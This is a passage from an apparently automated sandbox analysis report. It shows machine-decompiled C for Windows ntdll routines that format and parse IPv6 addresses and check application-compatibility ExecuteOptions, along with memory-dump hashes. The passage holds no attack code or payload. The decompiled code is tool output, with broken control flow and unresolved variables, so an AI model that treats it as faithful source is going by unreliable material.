                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: cc640471f74393ce21c295a193f15ba6937764d5581769d8c62c744091806747
                                                                                                                                                              • Instruction ID: ef7fcf1c0bb4431f08cd4c5886169a084f6116a71e6d091af68b5298319836e0
                                                                                                                                                              • Opcode Fuzzy Hash: cc640471f74393ce21c295a193f15ba6937764d5581769d8c62c744091806747
                                                                                                                                                              • Instruction Fuzzy Hash: 9B611971904655AACF34EFA9C8808BFBBBDEFD5300B54C52EF4DA47640D234AA41CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009E3B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E009E3B8E(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _t84;
				void* _t87;
				intOrPtr* _t97;
				void* _t104;
				void* _t106;
				void* _t109;
				intOrPtr _t116;
				signed int _t117;
				signed int _t122;
				signed int _t126;
				char _t127;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;

				_t133 = _a4;
				_t122 = 0;
				_t109 = _a8 + 0x2e;
				_v12 = 8;
				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
					L17:
					_a4 = _t122;
					_v8 = _t122;
					_v16 = _t122;
					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
						_v12 = 6;
					}
					_t127 = _v12;
					if(_t127 <= _t122) {
						L27:
						if(_a4 - _v8 <= 1) {
							_a4 = _t122;
							_v8 = _t122;
						}
						_t128 = 0;
						if(_v12 > _t122) {
							L33:
							L33:
							if(_v8 > _t128 || _t128 >= _a4) {
								if(_t128 != _t122 && _t128 != _a4) {
									_push(0x949c7e);
									_push(_t109 - _a8);
									_push(_a8);
									_t87 = E009F894A();
									_t134 = _t134 + 0xc;
									_a8 = _a8 + _t87;
								}
								_t84 = E009F894A(_a8, _t109 - _a8, 0x949c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
								_t134 = _t134 + 0x10;
								_a8 = _a8 + _t84;
							} else {
								_push(0x949c80);
								_push(_t109 - _a8);
								_push(_a8);
								_a8 = _a8 + E009F894A();
								_t134 = _t134 + 0xc;
								_t128 = _a4 - 1;
							}
							_t128 = _t128 + 1;
							if(_t128 < _v12) {
								goto L32;
							}
							goto L41;
							L32:
							_t122 = 0;
							goto L33;
						} else {
							L41:
							if(_v12 < 8) {
								_push( *(_t133 + 0xf) & 0x000000ff);
								_push( *(_t133 + 0xe) & 0x000000ff);
								_push( *(_t133 + 0xd) & 0x000000ff);
								_a8 = _a8 + E009F894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							}
							return _a8;
						}
					} else {
						_t116 = 1;
						_t97 = _t133;
						_v20 = _t127;
						do {
							if( *_t97 != _t122) {
								_v16 = _t116;
							} else {
								if(_t116 - _v16 > _a4 - _v8) {
									_v8 = _v16;
									_a4 = _t116;
								}
								_t122 = 0;
							}
							_t97 = _t97 + 2;
							_t116 = _t116 + 1;
							_t40 =  &_v20;
							 *_t40 = _v20 - 1;
						} while ( *_t40 != 0);
						goto L27;
					}
				} else {
					_t126 =  *(_t133 + 8) & 0x0000ffff;
					if(_t126 != 0) {
						L13:
						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
							_t122 = 0;
							goto L17;
						} else {
							_push( *(_t133 + 0xf) & 0x000000ff);
							_push( *(_t133 + 0xe) & 0x000000ff);
							_push( *(_t133 + 0xd) & 0x000000ff);
							_t104 = E009F894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							L12:
							return _t104 + _a8;
						}
					}
					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
					if(_t117 == 0) {
						L9:
						_t106 = 0x942926;
						L11:
						_push( *(_t133 + 0xf) & 0x000000ff);
						_push( *(_t133 + 0xe) & 0x000000ff);
						_push( *(_t133 + 0xd) & 0x000000ff);
						_push( *(_t133 + 0xc) & 0x000000ff);
						_t104 = E009F894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
						goto L12;
					}
					if(_t117 != 0xffff) {
						goto L13;
					}
					if(_t117 != 0) {
						_t106 = 0x949cac;
						goto L11;
					}
					goto L9;
				}
			}





















                                                                                                                                                              0x009e3b9b
                                                                                                                                                              0x009e3b9e
                                                                                                                                                              0x009e3ba0
                                                                                                                                                              0x009e3ba4
                                                                                                                                                              0x009e3bae
                                                                                                                                                              0x009e3c74
                                                                                                                                                              0x009e3c79
                                                                                                                                                              0x009e3c7c
                                                                                                                                                              0x009e3c7f
                                                                                                                                                              0x009e3c86
                                                                                                                                                              0x009e3c93
                                                                                                                                                              0x009e3c93
                                                                                                                                                              0x009e3c9a
                                                                                                                                                              0x009e3c9f
                                                                                                                                                              0x009e3cd0
                                                                                                                                                              0x009e3cd9
                                                                                                                                                              0x009e3cdb
                                                                                                                                                              0x009e3cde
                                                                                                                                                              0x009e3cde
                                                                                                                                                              0x009e3ce1
                                                                                                                                                              0x009e3ce6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3cf1
                                                                                                                                                              0x009e3cf4
                                                                                                                                                              0x009e3d1c
                                                                                                                                                              0x009e3d28
                                                                                                                                                              0x009e3d2d
                                                                                                                                                              0x009e3d2e
                                                                                                                                                              0x009e3d31
                                                                                                                                                              0x009e3d36
                                                                                                                                                              0x009e3d39
                                                                                                                                                              0x009e3d39
                                                                                                                                                              0x009e3d56
                                                                                                                                                              0x009e3d5b
                                                                                                                                                              0x009e3d5e
                                                                                                                                                              0x009e3cfb
                                                                                                                                                              0x009e3d00
                                                                                                                                                              0x009e3d05
                                                                                                                                                              0x009e3d06
                                                                                                                                                              0x009e3d11
                                                                                                                                                              0x009e3d14
                                                                                                                                                              0x009e3d17
                                                                                                                                                              0x009e3d17
                                                                                                                                                              0x009e3d61
                                                                                                                                                              0x009e3d65
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3cef
                                                                                                                                                              0x009e3cef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3ce8
                                                                                                                                                              0x009e3d67
                                                                                                                                                              0x009e3d6b
                                                                                                                                                              0x009e3d74
                                                                                                                                                              0x009e3d79
                                                                                                                                                              0x009e3d7e
                                                                                                                                                              0x009e3d95
                                                                                                                                                              0x009e3d95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3d98
                                                                                                                                                              0x009e3ca1
                                                                                                                                                              0x009e3ca3
                                                                                                                                                              0x009e3ca4
                                                                                                                                                              0x009e3ca6
                                                                                                                                                              0x009e3ca9
                                                                                                                                                              0x009e3cac
                                                                                                                                                              0x009e3cea
                                                                                                                                                              0x009e3cae
                                                                                                                                                              0x009e3cbb
                                                                                                                                                              0x009e3cc0
                                                                                                                                                              0x009e3cc3
                                                                                                                                                              0x009e3cc3
                                                                                                                                                              0x009e3cc6
                                                                                                                                                              0x009e3cc6
                                                                                                                                                              0x009e3cc9
                                                                                                                                                              0x009e3cca
                                                                                                                                                              0x009e3ccb
                                                                                                                                                              0x009e3ccb
                                                                                                                                                              0x009e3ccb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3ca9
                                                                                                                                                              0x009e3bdc
                                                                                                                                                              0x009e3bdc
                                                                                                                                                              0x009e3be8
                                                                                                                                                              0x009e3c3c
                                                                                                                                                              0x009e3c3f
                                                                                                                                                              0x009e3c72
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3c48
                                                                                                                                                              0x009e3c4f
                                                                                                                                                              0x009e3c54
                                                                                                                                                              0x009e3c59
                                                                                                                                                              0x009e3c68
                                                                                                                                                              0x009e3c34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3c34
                                                                                                                                                              0x009e3c3f
                                                                                                                                                              0x009e3bea
                                                                                                                                                              0x009e3bf1
                                                                                                                                                              0x009e3bff
                                                                                                                                                              0x009e3bff
                                                                                                                                                              0x009e3c0b
                                                                                                                                                              0x009e3c12
                                                                                                                                                              0x009e3c17
                                                                                                                                                              0x009e3c1c
                                                                                                                                                              0x009e3c21
                                                                                                                                                              0x009e3c2c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3c31
                                                                                                                                                              0x009e3bf8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3bfd
                                                                                                                                                              0x009e3c06
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3c06
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3bfd

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: 33f37287374ff4a18d05cd284349985b6a6a1acf5b12364785f337dae9f732ea
                                                                                                                                                              • Instruction ID: 082290b79603b7eefab49cc881f8ebf10841d698fdc6de3b53955bba702b10bc
                                                                                                                                                              • Opcode Fuzzy Hash: 33f37287374ff4a18d05cd284349985b6a6a1acf5b12364785f337dae9f732ea
                                                                                                                                                              • Instruction Fuzzy Hash: BB61C572900688ABCB21DF6AC84597E7BF9EF94311B24C529FCED97141E274DF809B50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00977EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00977EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xa22088; // 0x7741ce3b
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00977F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00993F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0094DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xa24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00993F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00950D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00993F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00958375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00993F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E009BE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00993F92();
					_t38 = 1;
					L2:
					return E0094E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                              0x00977f08
                                                                                                                                                              0x00977f0f
                                                                                                                                                              0x00977f12
                                                                                                                                                              0x00977f1b
                                                                                                                                                              0x00977f31
                                                                                                                                                              0x00993ead
                                                                                                                                                              0x00993eb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993eba
                                                                                                                                                              0x00993ecd
                                                                                                                                                              0x00993ed2
                                                                                                                                                              0x00993ee1
                                                                                                                                                              0x00993ee7
                                                                                                                                                              0x00993eec
                                                                                                                                                              0x00993f12
                                                                                                                                                              0x00993f18
                                                                                                                                                              0x00993f1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993f20
                                                                                                                                                              0x00993f26
                                                                                                                                                              0x00993f28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993f2e
                                                                                                                                                              0x00993f30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993f3a
                                                                                                                                                              0x00993f3b
                                                                                                                                                              0x00993f53
                                                                                                                                                              0x00993f64
                                                                                                                                                              0x00993f69
                                                                                                                                                              0x00993f6c
                                                                                                                                                              0x00993f6d
                                                                                                                                                              0x00993f6f
                                                                                                                                                              0x0099e304
                                                                                                                                                              0x0099e30f
                                                                                                                                                              0x0099e315
                                                                                                                                                              0x0099e31e
                                                                                                                                                              0x0099e321
                                                                                                                                                              0x0099e327
                                                                                                                                                              0x0099e329
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099e32f
                                                                                                                                                              0x0099e32f
                                                                                                                                                              0x0099e337
                                                                                                                                                              0x0099e33a
                                                                                                                                                              0x0099e33b
                                                                                                                                                              0x0099e33d
                                                                                                                                                              0x0099e33f
                                                                                                                                                              0x0099e341
                                                                                                                                                              0x0099e341
                                                                                                                                                              0x0099e34e
                                                                                                                                                              0x0099e353
                                                                                                                                                              0x0099e358
                                                                                                                                                              0x0099e35d
                                                                                                                                                              0x0099e35f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099e365
                                                                                                                                                              0x0099e365
                                                                                                                                                              0x0099e368
                                                                                                                                                              0x0099e36e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099e374
                                                                                                                                                              0x0099e32f
                                                                                                                                                              0x00993f75
                                                                                                                                                              0x00993f7a
                                                                                                                                                              0x00993f7c
                                                                                                                                                              0x00993f7e
                                                                                                                                                              0x00993f86
                                                                                                                                                              0x00977f39
                                                                                                                                                              0x00977f47
                                                                                                                                                              0x00977f47
                                                                                                                                                              0x00977f37
                                                                                                                                                              0x00977f37
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00993F12
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00993F75
                                                                                                                                                              • ExecuteOptions, xrefs: 00993F04
                                                                                                                                                              • Execute=1, xrefs: 00993F5E
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00993F4A
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0099E2FB
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00993EC4
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0099E345
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                              • API String ID: 3901378454-484625025
                                                                                                                                                              • Opcode ID: 8d27dc5c24f37baae20935fcc97e02403f95a3933c8b07e091d45d0fde62b8f3
                                                                                                                                                              • Instruction ID: 47390b47bd954c55c3769eec6c4fc2c5e6e3a0fa212b5a2b17cf9ddd15e27de0
                                                                                                                                                              • Opcode Fuzzy Hash: 8d27dc5c24f37baae20935fcc97e02403f95a3933c8b07e091d45d0fde62b8f3
                                                                                                                                                              • Instruction Fuzzy Hash: 3141B972A4021D7ADF20DF94DCC6FEAB3BCAB95704F0045A9F509E6181E670AB458F61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00980B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00980B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00958980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0094DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00980CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00980CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009806BA(_t135, _t178) == 0 || E00980A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00980CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00980CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009806BA(_t124, _t142) == 0 || E00980A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                              0x00980b21
                                                                                                                                                              0x00980b24
                                                                                                                                                              0x00980b27
                                                                                                                                                              0x00980b2a
                                                                                                                                                              0x00980b2d
                                                                                                                                                              0x00980b30
                                                                                                                                                              0x00980b33
                                                                                                                                                              0x00980b36
                                                                                                                                                              0x00980b39
                                                                                                                                                              0x00980b3e
                                                                                                                                                              0x00980c65
                                                                                                                                                              0x00980c68
                                                                                                                                                              0x00980c6a
                                                                                                                                                              0x00980c6f
                                                                                                                                                              0x009aeb42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb48
                                                                                                                                                              0x009aeb48
                                                                                                                                                              0x00980c75
                                                                                                                                                              0x00980c7a
                                                                                                                                                              0x009aeb54
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb5a
                                                                                                                                                              0x00980c80
                                                                                                                                                              0x00980c84
                                                                                                                                                              0x009aeb98
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeba6
                                                                                                                                                              0x00980cb8
                                                                                                                                                              0x00980cba
                                                                                                                                                              0x00980cd3
                                                                                                                                                              0x00980cda
                                                                                                                                                              0x00980ce4
                                                                                                                                                              0x00980ce9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980cec
                                                                                                                                                              0x00980c8c
                                                                                                                                                              0x009aeb63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb70
                                                                                                                                                              0x009aeb75
                                                                                                                                                              0x009aeb7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb8c
                                                                                                                                                              0x00980c96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980ca2
                                                                                                                                                              0x00980cac
                                                                                                                                                              0x00980cb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b44
                                                                                                                                                              0x00980b47
                                                                                                                                                              0x00980b49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b4f
                                                                                                                                                              0x00980b50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b56
                                                                                                                                                              0x00980b62
                                                                                                                                                              0x00980b7c
                                                                                                                                                              0x00980bac
                                                                                                                                                              0x00980a0f
                                                                                                                                                              0x009aeaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeac4
                                                                                                                                                              0x009aeac4
                                                                                                                                                              0x00980bd0
                                                                                                                                                              0x00980bd0
                                                                                                                                                              0x00980bd4
                                                                                                                                                              0x00980bd9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bdb
                                                                                                                                                              0x00980be0
                                                                                                                                                              0x009aeb0e
                                                                                                                                                              0x00980a1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980a1a
                                                                                                                                                              0x009aeb1a
                                                                                                                                                              0x009aeb1f
                                                                                                                                                              0x009aeb27
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb36
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb36
                                                                                                                                                              0x00980bea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bf6
                                                                                                                                                              0x00980c00
                                                                                                                                                              0x00980c03
                                                                                                                                                              0x00980c0b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c0b
                                                                                                                                                              0x009aeaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980a15
                                                                                                                                                              0x00980bb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bc6
                                                                                                                                                              0x00980bc6
                                                                                                                                                              0x00980bcb
                                                                                                                                                              0x00980c15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c1d
                                                                                                                                                              0x00980c20
                                                                                                                                                              0x00980c21
                                                                                                                                                              0x00980c24
                                                                                                                                                              0x00980c24
                                                                                                                                                              0x00980c26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c26
                                                                                                                                                              0x00980bcd
                                                                                                                                                              0x00000000
